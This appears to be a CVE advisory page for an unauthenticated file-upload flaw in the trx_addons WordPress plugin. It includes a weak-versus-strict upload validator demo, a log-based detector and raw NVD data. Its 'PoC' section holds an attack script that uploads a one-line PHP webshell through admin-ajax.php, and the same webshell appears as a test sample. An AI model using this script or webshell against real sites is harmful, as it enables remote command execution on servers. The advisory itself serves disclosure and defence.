Security Vulnerability Report
CVE-2026-1969 CVSS 5.3 MEDIUM

CVE-2026-1969

Published: 2026-03-23 06:16:20
Last Modified: 2026-04-15 15:05:48

Description

The trx_addons WordPress plugin before 2.38.5 does not correctly validate file types in one of its AJAX actions, allowing unauthenticated users to upload arbitrary files. This is due to an incorrect fix of CVE-2024-13448. The weakness is classified as CWE-434 (Unrestricted Upload of File with Dangerous Type); the CVSS vector below scores only a low integrity impact (C:N/I:L/A:N) and no confidentiality or availability impact.
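What "does not correctly validate file types" typically means for an upload handler is that the check keys off something the client controls. The example below is constructed for this advisory and is not code from the trx_addons plugin or from WPScan: a validator that trusts the client-declared Content-Type, next to a stricter one modelled on the approach of WordPress's own wp_check_filetype_and_ext() (extension allowlist plus magic-byte sniffing, ignoring the declared type). The allowlists, magic bytes, executable-extension list and sample uploads are all assumptions made for the demonstration, not values taken from the plugin.

```python
"""Constructed example for CVE-2026-1969 (not code from the trx_addons
plugin or from WPScan): a CWE-434 file-type check that trusts the
client-supplied Content-Type, beside a stricter check in the style of
WordPress's wp_check_filetype_and_ext(). Allowlists, magic bytes and the
sample uploads are assumptions made for the demonstration."""

# Extension -> MIME allowlist (assumed subset of wp_get_mime_types()).
ALLOWED_TYPES = {"jpg": "image/jpeg", "jpeg": "image/jpeg",
                 "png": "image/png", "gif": "image/gif"}

# Leading bytes that identify each allowed image type.
MAGIC = {"image/jpeg": b"\xff\xd8\xff",
         "image/png": b"\x89PNG\r\n\x1a\n",
         "image/gif": b"GIF8"}

# Extensions a typical PHP host will execute (assumed list; server configs
# vary). A file carrying any of these anywhere in its name (shell.php.jpg)
# is rejected outright.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def weak_check(filename, declared_type, content):
    """CWE-434 pattern: accept if the *client-declared* MIME type is an
    allowed image type. The multipart Content-Type is attacker-controlled,
    so a .php webshell sent as image/jpeg passes."""
    return declared_type in ALLOWED_TYPES.values()


def sniff_type(content):
    """Return the MIME type implied by the file's leading bytes, or None."""
    for mime, magic in MAGIC.items():
        if content.startswith(magic):
            return mime
    return None


def strict_check(filename, declared_type, content):
    """Ignore the declared type. Require an allowlisted final extension,
    no executable extension anywhere in the name, and content whose magic
    bytes match what that extension promises."""
    exts = filename.rsplit("/", 1)[-1].lower().split(".")[1:]
    if not exts or any(ext in EXECUTABLE_EXTS for ext in exts):
        return False
    expected = ALLOWED_TYPES.get(exts[-1])
    if expected is None:
        return False
    return sniff_type(content) == expected


# Constructed uploads: (label, filename, declared Content-Type, body).
SAMPLES = [
    ("webshell declared as jpeg", "shell.php", "image/jpeg",
     b'<?php system($_GET["cmd"]); ?>'),
    ("double extension", "shell.php.jpg", "image/jpeg",
     b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ("png body with .jpg name", "photo.jpg", "image/jpeg",
     b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ("genuine jpeg", "photo.jpg", "image/jpeg",
     b"\xff\xd8\xff\xe0" + b"\x00" * 16),
]


def evaluate(checker):
    """Run one validator over every sample; returns {label: accepted}."""
    return {label: checker(name, ctype, body)
            for label, name, ctype, body in SAMPLES}


if __name__ == "__main__":
    weak, strict = evaluate(weak_check), evaluate(strict_check)
    for label in weak:
        print(f"{label:26s} weak={weak[label]!s:5s} strict={strict[label]}")
```

The weak validator accepts all four uploads, including the PHP webshell; the strict one accepts only the genuine JPEG. Note that the strict check still cannot, on its own, make an executable file harmless: it must run server-side on the actual bytes, and the upload directory should additionally be configured not to execute scripts.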

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available for this CVE. The affected range given in the description is:

trx_addons < 2.38.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit(target_url):
    """
    PoC for CVE-2026-1969: Unauthenticated Arbitrary File Upload
    """
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Payload data for the vulnerable AJAX action.
    # Note: the specific 'action' name depends on the plugin internals,
    # usually 'trx_addons_upload_action' or similar.
    data = {
        'action': 'trx_addons_upload_action'  # Placeholder, replace with actual action name if known
    }

    # Malicious file to upload (PHP webshell), declared as image/jpeg so a
    # check that trusts the client-supplied Content-Type lets it through.
    files = {
        'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'image/jpeg')
    }

    try:
        response = requests.post(upload_url, data=data, files=files, timeout=10)
        if response.status_code == 200 and "success" in response.text.lower():
            print("[+] Exploit successful! File uploaded.")
            # The upload location is also a guess; the plugin may rename or move the file.
            print(f"[+] Check uploaded file at: {target_url}/wp-content/uploads/shell.php?cmd=whoami")
        else:
            print("[-] Exploit failed or target not vulnerable.")
    except requests.RequestException as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    target = "http://example.com"
    exploit(target)
```
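On the defensive side, the sequence the PoC produces (an unauthenticated POST to admin-ajax.php followed by a request for a PHP file under wp-content/uploads) is easy to spot in web server logs. The detector below is an added example for this advisory, not code from WPScan or the plugin; it assumes an Apache combined-style log prefix, and the IP addresses, timestamps and paths in the sample lines are constructed for the demonstration.

```python
"""Constructed example for CVE-2026-1969 (not from WPScan or the plugin):
flag the access-log pattern the PoC produces. The log format (Apache
combined-style prefix), IP addresses and paths are assumptions; the
sample lines are made up for the demonstration."""
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Any file under wp-content/uploads with a PHP-executable extension,
# with or without a query string (shell.php?cmd=...).
UPLOADS_EXEC_RE = re.compile(
    r"^/wp-content/uploads/[^?]*\.(php\d?|phtml|phar)(\?.*)?$", re.I)
AJAX_PATH = "/wp-admin/admin-ajax.php"

# Constructed sample traffic, not a real capture.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Mar/2026:06:10:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 48
203.0.113.7 - - [23/Mar/2026:06:10:02 +0000] "GET /wp-content/uploads/shell.php?cmd=whoami HTTP/1.1" 200 17
198.51.100.9 - - [23/Mar/2026:06:11:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 1024
198.51.100.9 - - [23/Mar/2026:06:11:31 +0000] "GET /wp-content/uploads/2026/03/photo.jpg HTTP/1.1" 200 52311
192.0.2.5 - - [23/Mar/2026:06:12:00 +0000] "GET /wp-content/uploads/x.phtml HTTP/1.1" 404 0
"""


def parse_log(text):
    """Yield one dict per line that matches LOG_RE; skip anything else."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_upload_execution(text):
    """Return one finding per request for an executable file under
    wp-content/uploads. 'primed' is True when the same client had already
    POSTed to admin-ajax.php earlier in the log, i.e. the PoC sequence.
    A 404 is still reported: it is an attempt worth knowing about."""
    ajax_posters = set()
    findings = []
    for rec in parse_log(text):
        if rec["method"] == "POST" and rec["path"].split("?")[0] == AJAX_PATH:
            ajax_posters.add(rec["ip"])
        elif UPLOADS_EXEC_RE.match(rec["path"]):
            findings.append({"ip": rec["ip"], "path": rec["path"],
                             "status": int(rec["status"]),
                             "primed": rec["ip"] in ajax_posters})
    return findings


if __name__ == "__main__":
    for finding in find_upload_execution(SAMPLE_LOG):
        print(finding)
```

Over the sample, 203.0.113.7 is reported as primed with a 200 on shell.php (the server actually served or executed the file), 198.51.100.9 is not reported because its follow-up fetch is an image, and 192.0.2.5 is reported unprimed with a 404. Any 200 on a PHP file under wp-content/uploads is a high-confidence signal regardless of whether the preceding AJAX POST was logged.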

References

https://wpscan.com/vulnerability/762530ae-80a5-4ff8-9725-6adab9498c33/
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-1969",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-23T06:16:20.257",
    "lastModified": "2026-04-15T15:05:47.827",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The trx_addons WordPress plugin before 2.38.5 does not correctly validate file types in one of its AJAX action, allowing unauthenticated users to upload arbitrary file. This is due to an incorrect fix of CVE-2024-13448"
      },
      {
        "lang": "es",
        "value": "El plugin de WordPress trx_addons anterior a la versión 2.38.5 no valida correctamente los tipos de archivo en una de sus acciones AJAX, permitiendo a usuarios no autenticados subir un archivo arbitrario. Esto se debe a una corrección incorrecta de CVE-2024-13448."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/762530ae-80a5-4ff8-9725-6adab9498c33/",
        "source": "[email protected]"
      }
    ]
  }
}
```